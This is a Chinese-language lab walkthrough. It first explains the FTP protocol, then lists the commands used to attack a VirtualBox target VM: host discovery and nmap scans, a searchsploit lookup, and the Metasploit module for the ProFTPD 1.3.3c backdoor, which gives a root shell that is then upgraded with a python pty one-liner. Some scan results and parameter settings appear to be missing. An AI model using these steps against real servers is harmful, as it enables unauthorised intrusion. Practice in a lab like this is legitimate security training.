FTP协议
FTP(File Transfer Protocol,文件传输协议) 是 TCP/IP 协议组中的协议之一。FTP协议包括两个组成部分,其一为FTP服务器,其二为FTP客户端。其中FTP服务器用来存储文件,用户可以使用FTP客户端通过FTP协议访问位于FTP服务器上的资源。在开发网站的时候,通常利用FTP协议把网页或程序传到Web服务器上。此外,由于FTP传输效率非常高,在网络上传输大的文件时,一般也采用该协议。
默认情况下FTP协议使用TCP端口中的 20和21这两个端口,其中20用于传输数据,21用于传输控制信息。但是,是否使用20作为传输数据的端口与FTP使用的传输模式有关,如果采用主动模式,那么数据传输端口就是20;如果采用被动模式,则具体最终使用哪个端口要服务器端和客户端协商决定。
百度百科
环境准备:
1.靶场导入:使用 Oracle VM VirtualBox
靶场导入完成,启动靶场,等待攻击。。。
2. 打开kali攻击机 攻击机地址:192.168.31.101
root@kali:~# ifconfig //查看攻击机IP地址
netdiscover -r 192.168.31.1/24 #查看同一网段内的活动主机,找到靶场IP.
nmap -sV 192.168.31.35#扫描主机服务信息及服务版本
探测到了开放了如下服务:
或
nmap -A -v -T4 192.168.31.35 #扫描主机全部信息
searchsploit ProFTPD 1.3.3c
cat /usr/share/exploitdb/exploits/linux/remote/15662.txt
文本部分代码
msfconsole
search ProFTPd 1.3.3c
use exploit/unix/ftp/proftpd_133c_backdoor
设置参数
设置成功
id
python -c "import pty;pty.spawn('/bin/bash')" #优化shell